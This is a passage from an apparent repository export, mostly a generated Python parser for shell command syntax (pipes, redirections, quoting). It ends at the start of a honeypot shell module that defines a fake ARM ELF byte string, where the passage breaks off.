= self._offset\n                            self._expected = []\n                        if self._offset == self._failure:\n                            self._expected.append('\"&\"')\n                    if address4 is FAILURE:\n                        self._offset = index4\n                if address4 is not FAILURE:\n                    elements1.append(address4)\n                    address5 = FAILURE\n                    address5 = self._read_sep()\n                    if address5 is not FAILURE:\n                        elements1.append(address5)\n                        address6 = FAILURE\n                        address6 = self._read_cmdlist()\n                        if address6 is not FAILURE:\n                            elements1.append(address6)\n                        else:\n                            elements1 = None\n                            self._offset = index3\n                    else:\n                        elements1 = None\n                        self._offset = index3\n                else:\n                    elements1 = None\n                    self._offset = index3\n            else:\n                elements1 = None\n                self._offset = index3\n            if elements1 is None:\n                address2 = FAILURE\n            else:\n                address2 = TreeNode2(self._input[index3:self._offset], index3, elements1)\n                self._offset = self._offset\n            if address2 is FAILURE:\n                address2 = TreeNode(self._input[index2:index2], index2)\n                self._offset = index2\n            if address2 is not FAILURE:\n                elements0.append(address2)\n            else:\n                elements0 = None\n                self._offset = index1\n        else:\n            elements0 = None\n            self._offset = index1\n        if elements0 is None:\n            address0 = FAILURE\n        else:\n            address0 = self._actions.make_list(self._input, index1, self._offset, elements0)\n            self._offset = self._offset\n        self._cache['cmdlist'][index0] = (address0, self._offset)\n        return address0\n\n    def _read_cmdsingle(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['cmdsingle'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        index1, elements0 = self._offset, []\n        address1 = FAILURE\n        address1 = self._read_cmdpipe()\n        if address1 is not FAILURE:\n            elements0.append(address1)\n            address2 = FAILURE\n            index2 = self._offset\n            index3, elements1 = self._offset, []\n            address3 = FAILURE\n            address3 = self._read_sep()\n            if address3 is not FAILURE:\n                elements1.append(address3)\n                address4 = FAILURE\n                index4 = self._offset\n                chunk0 = None\n                if self._offset < self._input_size:\n                    chunk0 = self._input[self._offset:self._offset + 2]\n                if chunk0 == '||':\n                    address4 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)\n                    self._offset = self._offset + 2\n                else:\n                    address4 = FAILURE\n                    if self._offset > self._failure:\n                        self._failure = self._offset\n                        self._expected = []\n                    if self._offset == self._failure:\n                        self._expected.append('\"||\"')\n                if address4 is FAILURE:\n                    self._offset = index4\n                    chunk1 = None\n                    if self._offset < self._input_size:\n                        chunk1 = self._input[self._offset:self._offset + 2]\n                    if chunk1 == '&&':\n                        address4 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)\n                        self._offset = self._offset + 2\n                    else:\n                        address4 = FAILURE\n                        if self._offset > self._failure:\n                            self._failure = self._offset\n                            self._expected = []\n                        if self._offset == self._failure:\n                            self._expected.append('\"&&\"')\n                    if address4 is FAILURE:\n                        self._offset = index4\n                if address4 is not FAILURE:\n                    elements1.append(address4)\n                    address5 = FAILURE\n                    address5 = self._read_sep()\n                    if address5 is not FAILURE:\n                        elements1.append(address5)\n                        address6 = FAILURE\n                        address6 = self._read_cmdsingle()\n                        if address6 is not FAILURE:\n                            elements1.append(address6)\n                        else:\n                            elements1 = None\n                            self._offset = index3\n                    else:\n                        elements1 = None\n                        self._offset = index3\n                else:\n                    elements1 = None\n                    self._offset = index3\n            else:\n                elements1 = None\n                self._offset = index3\n            if elements1 is None:\n                address2 = FAILURE\n            else:\n                address2 = TreeNode4(self._input[index3:self._offset], index3, elements1)\n                self._offset = self._offset\n            if address2 is FAILURE:\n                address2 = TreeNode(self._input[index2:index2], index2)\n                self._offset = index2\n            if address2 is not FAILURE:\n                elements0.append(address2)\n            else:\n                elements0 = None\n                self._offset = index1\n        else:\n            elements0 = None\n            self._offset = index1\n        if elements0 is None:\n            address0 = FAILURE\n        else:\n            address0 = self._actions.make_single(self._input, index1, self._offset, elements0)\n            self._offset = self._offset\n        self._cache['cmdsingle'][index0] = (address0, self._offset)\n        return address0\n\n    def _read_cmdpipe(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['cmdpipe'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        index1, elements0 = self._offset, []\n        address1 = FAILURE\n        address1 = self._read_cmdredir()\n        if address1 is not FAILURE:\n            elements0.append(address1)\n            address2 = FAILURE\n            index2 = self._offset\n            index3, elements1 = self._offset, []\n            address3 = FAILURE\n            address3 = self._read_sep()\n            if address3 is not FAILURE:\n                elements1.append(address3)\n                address4 = FAILURE\n                index4, elements2 = self._offset, []\n                address5 = FAILURE\n                chunk0 = None\n                if self._offset < self._input_size:\n                    chunk0 = self._input[self._offset:self._offset + 1]\n                if chunk0 == '|':\n                    address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n                    self._offset = self._offset + 1\n                else:\n                    address5 = FAILURE\n                    if self._offset > self._failure:\n                        self._failure = self._offset\n                        self._expected = []\n                    if self._offset == self._failure:\n                        self._expected.append('\"|\"')\n                if address5 is not FAILURE:\n                    elements2.append(address5)\n                    address6 = FAILURE\n                    index5 = self._offset\n                    chunk1 = None\n                    if self._offset < self._input_size:\n                        chunk1 = self._input[self._offset:self._offset + 1]\n                    if chunk1 == '|':\n                        address6 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n                        self._offset = self._offset + 1\n                    else:\n                        address6 = FAILURE\n                        if self._offset > self._failure:\n                            self._failure = self._offset\n                            self._expected = []\n                        if self._offset == self._failure:\n                            self._expected.append('\"|\"')\n                    self._offset = index5\n                    if address6 is FAILURE:\n                        address6 = TreeNode(self._input[self._offset:self._offset], self._offset)\n                        self._offset = self._offset\n                    else:\n                        address6 = FAILURE\n                    if address6 is not FAILURE:\n                        elements2.append(address6)\n                    else:\n                        elements2 = None\n                        self._offset = index4\n                else:\n                    elements2 = None\n                    self._offset = index4\n                if elements2 is None:\n                    address4 = FAILURE\n                else:\n                    address4 = TreeNode(self._input[index4:self._offset], index4, elements2)\n                    self._offset = self._offset\n                if address4 is not FAILURE:\n                    elements1.append(address4)\n                    address7 = FAILURE\n                    address7 = self._read_sep()\n                    if address7 is not FAILURE:\n                        elements1.append(address7)\n                        address8 = FAILURE\n                        address8 = self._read_cmdpipe()\n                        if address8 is not FAILURE:\n                            elements1.append(address8)\n                        else:\n                            elements1 = None\n                            self._offset = index3\n                    else:\n                        elements1 = None\n                        self._offset = index3\n                else:\n                    elements1 = None\n                    self._offset = index3\n            else:\n                elements1 = None\n                self._offset = index3\n            if elements1 is None:\n                address2 = FAILURE\n            else:\n                address2 = TreeNode6(self._input[index3:self._offset], index3, elements1)\n                self._offset = self._offset\n            if address2 is FAILURE:\n                address2 = TreeNode(self._input[index2:index2], index2)\n                self._offset = index2\n            if address2 is not FAILURE:\n                elements0.append(address2)\n            else:\n                elements0 = None\n                self._offset = index1\n        else:\n            elements0 = None\n            self._offset = index1\n        if elements0 is None:\n            address0 = FAILURE\n        else:\n            address0 = self._actions.make_pipe(self._input, index1, self._offset, elements0)\n            self._offset = self._offset\n        self._cache['cmdpipe'][index0] = (address0, self._offset)\n        return address0\n\n    def _read_cmdredir(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['cmdredir'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        index1, elements0 = self._offset, []\n        address1 = FAILURE\n        address1 = self._read_cmdargs()\n        if address1 is not FAILURE:\n            elements0.append(address1)\n            address2 = FAILURE\n            remaining0, index2, elements1, address3 = 0, self._offset, [], True\n            while address3 is not FAILURE:\n                index3, elements2 = self._offset, []\n                address4 = FAILURE\n                address4 = self._read_sep()\n                if address4 is not FAILURE:\n                    elements2.append(address4)\n                    address5 = FAILURE\n                    index4 = self._offset\n                    chunk0 = None\n                    if self._offset < self._input_size:\n                        chunk0 = self._input[self._offset:self._offset + 3]\n                    if chunk0 == '>>-':\n                        address5 = TreeNode(self._input[self._offset:self._offset + 3], self._offset)\n                        self._offset = self._offset + 3\n                    else:\n                        address5 = FAILURE\n                        if self._offset > self._failure:\n                            self._failure = self._offset\n                            self._expected = []\n                        if self._offset == self._failure:\n                            self._expected.append('\">>-\"')\n                    if address5 is FAILURE:\n                        self._offset = index4\n                        chunk1 = None\n                        if self._offset < self._input_size:\n                            chunk1 = self._input[self._offset:self._offset + 2]\n                        if chunk1 == '>>':\n                            address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)\n                            self._offset = self._offset + 2\n                        else:\n                            address5 = FAILURE\n                            if self._offset > self._failure:\n                                self._failure = self._offset\n                                self._expected = []\n                            if self._offset == self._failure:\n                                self._expected.append('\">>\"')\n                        if address5 is FAILURE:\n                            self._offset = index4\n                            chunk2 = None\n                            if self._offset < self._input_size:\n                                chunk2 = self._input[self._offset:self._offset + 2]\n                            if chunk2 == '<<':\n                                address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)\n                                self._offset = self._offset + 2\n                            else:\n                                address5 = FAILURE\n                                if self._offset > self._failure:\n                                    self._failure = self._offset\n                                    self._expected = []\n                                if self._offset == self._failure:\n                                    self._expected.append('\"<<\"')\n                            if address5 is FAILURE:\n                                self._offset = index4\n                                chunk3 = None\n                                if self._offset < self._input_size:\n                                    chunk3 = self._input[self._offset:self._offset + 2]\n                                if chunk3 == '<>':\n                                    address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)\n                                    self._offset = self._offset + 2\n                                else:\n                                    address5 = FAILURE\n                                    if self._offset > self._failure:\n                                        self._failure = self._offset\n                                        self._expected = []\n                                    if self._offset == self._failure:\n                                        self._expected.append('\"<>\"')\n                                if address5 is FAILURE:\n                                    self._offset = index4\n                                    chunk4 = None\n                                    if self._offset < self._input_size:\n                                        chunk4 = self._input[self._offset:self._offset + 2]\n                                    if chunk4 == '<&':\n                                        address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)\n                                        self._offset = self._offset + 2\n                                    else:\n                                        address5 = FAILURE\n                                        if self._offset > self._failure:\n                                            self._failure = self._offset\n                                            self._expected = []\n                                        if self._offset == self._failure:\n                                            self._expected.append('\"<&\"')\n                                    if address5 is FAILURE:\n                                        self._offset = index4\n                                        chunk5 = None\n                                        if self._offset < self._input_size:\n                                            chunk5 = self._input[self._offset:self._offset + 2]\n                                        if chunk5 == '>&':\n                                            address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset)\n                                            self._offset = self._offset + 2\n                                        else:\n                                            address5 = FAILURE\n                                            if self._offset > self._failure:\n                                                self._failure = self._offset\n                                                self._expected = []\n                                            if self._offset == self._failure:\n                                                self._expected.append('\">&\"')\n                                        if address5 is FAILURE:\n                                            self._offset = index4\n                                            chunk6 = None\n                                            if self._offset < self._input_size:\n                                                chunk6 = self._input[self._offset:self._offset + 1]\n                                            if chunk6 == '<':\n                                                address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n                                                self._offset = self._offset + 1\n                                            else:\n                                                address5 = FAILURE\n                                                if self._offset > self._failure:\n                                                    self._failure = self._offset\n                                                    self._expected = []\n                                                if self._offset == self._failure:\n                                                    self._expected.append('\"<\"')\n                                            if address5 is FAILURE:\n                                                self._offset = index4\n                                                chunk7 = None\n                                                if self._offset < self._input_size:\n                                                    chunk7 = self._input[self._offset:self._offset + 1]\n                                                if chunk7 == '>':\n                                                    address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n                                                    self._offset = self._offset + 1\n                                                else:\n                                                    address5 = FAILURE\n                                                    if self._offset > self._failure:\n                                                        self._failure = self._offset\n                                                        self._expected = []\n                                                    if self._offset == self._failure:\n                                                        self._expected.append('\">\"')\n                                                if address5 is FAILURE:\n                                                    self._offset = index4\n                    if address5 is not FAILURE:\n                        elements2.append(address5)\n                        address6 = FAILURE\n                        address6 = self._read_sep()\n                        if address6 is not FAILURE:\n                            elements2.append(address6)\n                            address7 = FAILURE\n                            address7 = self._read_arg()\n                            if address7 is not FAILURE:\n                                elements2.append(address7)\n                            else:\n                                elements2 = None\n                                self._offset = index3\n                        else:\n                            elements2 = None\n                            self._offset = index3\n                    else:\n                        elements2 = None\n                        self._offset = index3\n                else:\n                    elements2 = None\n                    self._offset = index3\n                if elements2 is None:\n                    address3 = FAILURE\n                else:\n                    address3 = TreeNode8(self._input[index3:self._offset], index3, elements2)\n                    self._offset = self._offset\n                if address3 is not FAILURE:\n                    elements1.append(address3)\n                    remaining0 -= 1\n            if remaining0 <= 0:\n                address2 = TreeNode(self._input[index2:self._offset], index2, elements1)\n                self._offset = self._offset\n            else:\n                address2 = FAILURE\n            if address2 is not FAILURE:\n                elements0.append(address2)\n            else:\n                elements0 = None\n                self._offset = index1\n        else:\n            elements0 = None\n            self._offset = index1\n        if elements0 is None:\n            address0 = FAILURE\n        else:\n            address0 = self._actions.make_redir(self._input, index1, self._offset, elements0)\n            self._offset = self._offset\n        self._cache['cmdredir'][index0] = (address0, self._offset)\n        return address0\n\n    def _read_cmdargs(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['cmdargs'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        index1 = self._offset\n        address0 = self._read_cmdbrac()\n        if address0 is FAILURE:\n            self._offset = index1\n            address0 = self._read_args()\n            if address0 is FAILURE:\n                self._offset = index1\n        self._cache['cmdargs'][index0] = (address0, self._offset)\n        return address0\n\n    def _read_cmdbrac(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['cmdbrac'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        index1, elements0 = self._offset, []\n        address1 = FAILURE\n        chunk0 = None\n        if self._offset < self._input_size:\n            chunk0 = self._input[self._offset:self._offset + 1]\n        if chunk0 == '(':\n            address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n            self._offset = self._offset + 1\n        else:\n            address1 = FAILURE\n            if self._offset > self._failure:\n                self._failure = self._offset\n                self._expected = []\n            if self._offset == self._failure:\n                self._expected.append('\"(\"')\n        if address1 is not FAILURE:\n            elements0.append(address1)\n            address2 = FAILURE\n            address2 = self._read_sep()\n            if address2 is not FAILURE:\n                elements0.append(address2)\n                address3 = FAILURE\n                address3 = self._read_cmd()\n                if address3 is not FAILURE:\n                    elements0.append(address3)\n                    address4 = FAILURE\n                    address4 = self._read_sep()\n                    if address4 is not FAILURE:\n                        elements0.append(address4)\n                        address5 = FAILURE\n                        chunk1 = None\n                        if self._offset < self._input_size:\n                            chunk1 = self._input[self._offset:self._offset + 1]\n                        if chunk1 == ')':\n                            address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n                            self._offset = self._offset + 1\n                        else:\n                            address5 = FAILURE\n                            if self._offset > self._failure:\n                                self._failure = self._offset\n                                self._expected = []\n                            if self._offset == self._failure:\n                                self._expected.append('\")\"')\n                        if address5 is not FAILURE:\n                            elements0.append(address5)\n                        else:\n                            elements0 = None\n                            self._offset = index1\n                    else:\n                        elements0 = None\n                        self._offset = index1\n                else:\n                    elements0 = None\n                    self._offset = index1\n            else:\n                elements0 = None\n                self._offset = index1\n        else:\n            elements0 = None\n            self._offset = index1\n        if elements0 is None:\n            address0 = FAILURE\n        else:\n            address0 = self._actions.make_cmdbrac(self._input, index1, self._offset, elements0)\n            self._offset = self._offset\n        self._cache['cmdbrac'][index0] = (address0, self._offset)\n        return address0\n\n    def _read_args(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['args'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        index1, elements0 = self._offset, []\n        address1 = FAILURE\n        address1 = self._read_arg()\n        if address1 is not FAILURE:\n            elements0.append(address1)\n            address2 = FAILURE\n            remaining0, index2, elements1, address3 = 0, self._offset, [], True\n            while address3 is not FAILURE:\n                index3, elements2 = self._offset, []\n                address4 = FAILURE\n                remaining1, index4, elements3, address5 = 1, self._offset, [], True\n                while address5 is not FAILURE:\n                    chunk0 = None\n                    if self._offset < self._input_size:\n                        chunk0 = self._input[self._offset:self._offset + 1]\n                    if chunk0 == ' ':\n                        address5 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n                        self._offset = self._offset + 1\n                    else:\n                        address5 = FAILURE\n                        if self._offset > self._failure:\n                            self._failure = self._offset\n                            self._expected = []\n                        if self._offset == self._failure:\n                            self._expected.append('\" \"')\n                    if address5 is not FAILURE:\n                        elements3.append(address5)\n                        remaining1 -= 1\n                if remaining1 <= 0:\n                    address4 = TreeNode(self._input[index4:self._offset], index4, elements3)\n                    self._offset = self._offset\n                else:\n                    address4 = FAILURE\n                if address4 is not FAILURE:\n                    elements2.append(address4)\n                    address6 = FAILURE\n                    address6 = self._read_arg()\n                    if address6 is not FAILURE:\n                        elements2.append(address6)\n                    else:\n                        elements2 = None\n                        self._offset = index3\n                else:\n                    elements2 = None\n                    self._offset = index3\n                if elements2 is None:\n                    address3 = FAILURE\n                else:\n                    address3 = TreeNode11(self._input[index3:self._offset], index3, elements2)\n                    self._offset = self._offset\n                if address3 is not FAILURE:\n                    elements1.append(address3)\n                    remaining0 -= 1\n            if remaining0 <= 0:\n                address2 = TreeNode(self._input[index2:self._offset], index2, elements1)\n                self._offset = self._offset\n            else:\n                address2 = FAILURE\n            if address2 is not FAILURE:\n                elements0.append(address2)\n            else:\n                elements0 = None\n                self._offset = index1\n        else:\n            elements0 = None\n            self._offset = index1\n        if elements0 is None:\n            address0 = FAILURE\n        else:\n            address0 = self._actions.make_args(self._input, index1, self._offset, elements0)\n            self._offset = self._offset\n        self._cache['args'][index0] = (address0, self._offset)\n        return address0\n\n    def _read_arg(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['arg'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        index1 = self._offset\n        address0 = self._read_arg_quot1()\n        if address0 is FAILURE:\n            self._offset = index1\n            address0 = self._read_arg_quot2()\n            if address0 is FAILURE:\n                self._offset = index1\n                address0 = self._read_arg_noquot()\n                if address0 is FAILURE:\n                    self._offset = index1\n                    address0 = self._read_empty()\n                    if address0 is FAILURE:\n                        self._offset = index1\n        self._cache['arg'][index0] = (address0, self._offset)\n        return address0\n\n    def _read_arg_noempty(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['arg_noempty'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        index1 = self._offset\n        address0 = self._read_arg_quot1()\n        if address0 is FAILURE:\n            self._offset = index1\n            address0 = self._read_arg_quot2()\n            if address0 is FAILURE:\n                self._offset = index1\n                address0 = self._read_arg_noquot()\n                if address0 is FAILURE:\n                    self._offset = index1\n        self._cache['arg_noempty'][index0] = (address0, self._offset)\n        return address0\n\n    def _read_arg_quot1(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['arg_quot1'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        index1, elements0 = self._offset, []\n        address1 = FAILURE\n        chunk0 = None\n        if self._offset < self._input_size:\n            chunk0 = self._input[self._offset:self._offset + 1]\n        if chunk0 == '\\'':\n            address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n            self._offset = self._offset + 1\n        else:\n            address1 = FAILURE\n            if self._offset > self._failure:\n                self._failure = self._offset\n                self._expected = []\n            if self._offset == self._failure:\n                self._expected.append('\"\\'\"')\n        if address1 is not FAILURE:\n            elements0.append(address1)\n            address2 = FAILURE\n            remaining0, index2, elements1, address3 = 0, self._offset, [], True\n            while address3 is not FAILURE:\n                chunk1 = None\n                if self._offset < self._input_size:\n                    chunk1 = self._input[self._offset:self._offset + 1]\n                if chunk1 is not None and Grammar.REGEX_1.search(chunk1):\n                    address3 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n                    self._offset = self._offset + 1\n                else:\n                    address3 = FAILURE\n                    if self._offset > self._failure:\n                        self._failure = self._offset\n                        self._expected = []\n                    if self._offset == self._failure:\n                        self._expected.append('[^\\']')\n                if address3 is not FAILURE:\n                    elements1.append(address3)\n                    remaining0 -= 1\n            if remaining0 <= 0:\n                address2 = TreeNode(self._input[index2:self._offset], index2, elements1)\n                self._offset = self._offset\n            else:\n                address2 = FAILURE\n            if address2 is not FAILURE:\n                elements0.append(address2)\n                address4 = FAILURE\n                chunk2 = None\n                if self._offset < self._input_size:\n                    chunk2 = self._input[self._offset:self._offset + 1]\n                if chunk2 == '\\'':\n                    address4 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n                    self._offset = self._offset + 1\n                else:\n                    address4 = FAILURE\n                    if self._offset > self._failure:\n                        self._failure = self._offset\n                        self._expected = []\n                    if self._offset == self._failure:\n                        self._expected.append('\"\\'\"')\n                if address4 is not FAILURE:\n                    elements0.append(address4)\n                else:\n                    elements0 = None\n                    self._offset = index1\n            else:\n                elements0 = None\n                self._offset = index1\n        else:\n            elements0 = None\n            self._offset = index1\n        if elements0 is None:\n            address0 = FAILURE\n        else:\n            address0 = self._actions.make_arg_quot(self._input, index1, self._offset, elements0)\n            self._offset = self._offset\n        self._cache['arg_quot1'][index0] = (address0, self._offset)\n        return address0\n\n    def _read_arg_quot2(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['arg_quot2'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        index1, elements0 = self._offset, []\n        address1 = FAILURE\n        chunk0 = None\n        if self._offset < self._input_size:\n            chunk0 = self._input[self._offset:self._offset + 1]\n        if chunk0 == '\"':\n            address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n            self._offset = self._offset + 1\n        else:\n            address1 = FAILURE\n            if self._offset > self._failure:\n                self._failure = self._offset\n                self._expected = []\n            if self._offset == self._failure:\n                self._expected.append('\\'\"\\'')\n        if address1 is not FAILURE:\n            elements0.append(address1)\n            address2 = FAILURE\n            remaining0, index2, elements1, address3 = 0, self._offset, [], True\n            while address3 is not FAILURE:\n                chunk1 = None\n                if self._offset < self._input_size:\n                    chunk1 = self._input[self._offset:self._offset + 1]\n                if chunk1 is not None and Grammar.REGEX_2.search(chunk1):\n                    address3 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n                    self._offset = self._offset + 1\n                else:\n                    address3 = FAILURE\n                    if self._offset > self._failure:\n                        self._failure = self._offset\n                        self._expected = []\n                    if self._offset == self._failure:\n                        self._expected.append('[^\"]')\n                if address3 is not FAILURE:\n                    elements1.append(address3)\n                    remaining0 -= 1\n            if remaining0 <= 0:\n                address2 = TreeNode(self._input[index2:self._offset], index2, elements1)\n                self._offset = self._offset\n            else:\n                address2 = FAILURE\n            if address2 is not FAILURE:\n                elements0.append(address2)\n                address4 = FAILURE\n                chunk2 = None\n                if self._offset < self._input_size:\n                    chunk2 = self._input[self._offset:self._offset + 1]\n                if chunk2 == '\"':\n                    address4 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n                    self._offset = self._offset + 1\n                else:\n                    address4 = FAILURE\n                    if self._offset > self._failure:\n                        self._failure = self._offset\n                        self._expected = []\n                    if self._offset == self._failure:\n                        self._expected.append('\\'\"\\'')\n                if address4 is not FAILURE:\n                    elements0.append(address4)\n                else:\n                    elements0 = None\n                    self._offset = index1\n            else:\n                elements0 = None\n                self._offset = index1\n        else:\n            elements0 = None\n            self._offset = index1\n        if elements0 is None:\n            address0 = FAILURE\n        else:\n            address0 = self._actions.make_arg_quot(self._input, index1, self._offset, elements0)\n            self._offset = self._offset\n        self._cache['arg_quot2'][index0] = (address0, self._offset)\n        return address0\n\n    def _read_arg_noquot(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['arg_noquot'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        remaining0, index1, elements0, address1 = 1, self._offset, [], True\n        while address1 is not FAILURE:\n            chunk0 = None\n            if self._offset < self._input_size:\n                chunk0 = self._input[self._offset:self._offset + 1]\n            if chunk0 is not None and Grammar.REGEX_3.search(chunk0):\n                address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n                self._offset = self._offset + 1\n            else:\n                address1 = FAILURE\n                if self._offset > self._failure:\n                    self._failure = self._offset\n                    self._expected = []\n                if self._offset == self._failure:\n                    self._expected.append('[^ ;|&()\"\\'><]')\n            if address1 is not FAILURE:\n                elements0.append(address1)\n                remaining0 -= 1\n        if remaining0 <= 0:\n            address0 = self._actions.make_arg_noquot(self._input, index1, self._offset, elements0)\n            self._offset = self._offset\n        else:\n            address0 = FAILURE\n        self._cache['arg_noquot'][index0] = (address0, self._offset)\n        return address0\n\n    def _read_empty(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['empty'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        index1 = self._offset\n        chunk0 = None\n        if self._offset < self._input_size:\n            chunk0 = self._input[self._offset:self._offset + 0]\n        if chunk0 == '':\n            address0 = TreeNode(self._input[self._offset:self._offset + 0], self._offset)\n            self._offset = self._offset + 0\n        else:\n            address0 = FAILURE\n            if self._offset > self._failure:\n                self._failure = self._offset\n                self._expected = []\n            if self._offset == self._failure:\n                self._expected.append('\"\"')\n        if address0 is FAILURE:\n            address0 = TreeNode(self._input[index1:index1], index1)\n            self._offset = index1\n        self._cache['empty'][index0] = (address0, self._offset)\n        return address0\n\n    def _read_sep(self):\n        address0, index0 = FAILURE, self._offset\n        cached = self._cache['sep'].get(index0)\n        if cached:\n            self._offset = cached[1]\n            return cached[0]\n        remaining0, index1, elements0, address1 = 0, self._offset, [], True\n        while address1 is not FAILURE:\n            chunk0 = None\n            if self._offset < self._input_size:\n                chunk0 = self._input[self._offset:self._offset + 1]\n            if chunk0 == ' ':\n                address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)\n                self._offset = self._offset + 1\n            else:\n                address1 = FAILURE\n                if self._offset > self._failure:\n                    self._failure = self._offset\n                    self._expected = []\n                if self._offset == self._failure:\n                    self._expected.append('\" \"')\n            if address1 is not FAILURE:\n                elements0.append(address1)\n                remaining0 -= 1\n        if remaining0 <= 0:\n            address0 = TreeNode(self._input[index1:self._offset], index1, elements0)\n            self._offset = self._offset\n        else:\n            address0 = FAILURE\n        self._cache['sep'][index0] = (address0, self._offset)\n        return address0\n\n\nclass Parser(Grammar):\n    def __init__(self, input, actions, types):\n        self._input = input\n        self._input_size = len(input)\n        self._actions = actions\n        self._types = types\n        self._offset = 0\n        self._cache = defaultdict(dict)\n        self._failure = 0\n        self._expected = []\n\n    def parse(self):\n        tree = self._read_cmd()\n        if tree is not FAILURE and self._offset == self._input_size:\n            return tree\n        if not self._expected:\n            self._failure = self._offset\n            self._expected.append('<EOF>')\n        raise ParseError(format_error(self._input, self._failure, self._expected))\n\n\ndef format_error(input, offset, expected):\n    lines, line_no, position = input.split('\\n'), 0, 0\n    while position <= offset:\n        position += len(lines[line_no]) + 1\n        line_no += 1\n    message, line = 'Line ' + str(line_no) + ': expected ' + ', '.join(expected) + '\\n', lines[line_no - 1]\n    message += line + '\\n'\n    position -= len(line) + 1\n    message += ' ' * (offset - position)\n    return message + '^'\n\ndef parse(input, actions=None, types=None):\n    parser = Parser(input, actions, types)\n    return parser.parse()\n"
  },
  {
    "path": "honeypot/shell/shell.py",
    "content": "import sys\nimport traceback\n\nfrom grammar       import parse, TreeNode\nfrom commands.base import Proc\n\ndef filter_ascii(string):\n\tstring = ''.join(char for char in string if ord(char) < 128 and ord(char) > 32 or char in \" \")\n\treturn string\n\n###\n\nELF_BIN_ARM  = \"\\x7fELF\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00(\\x00\\x01\\x00\\x00\\x00h\\xc2\\x00\\x004\\x00\\x00\\x00X^\\x01\\x00\\x02\\x00\\x00\\x054\\x00 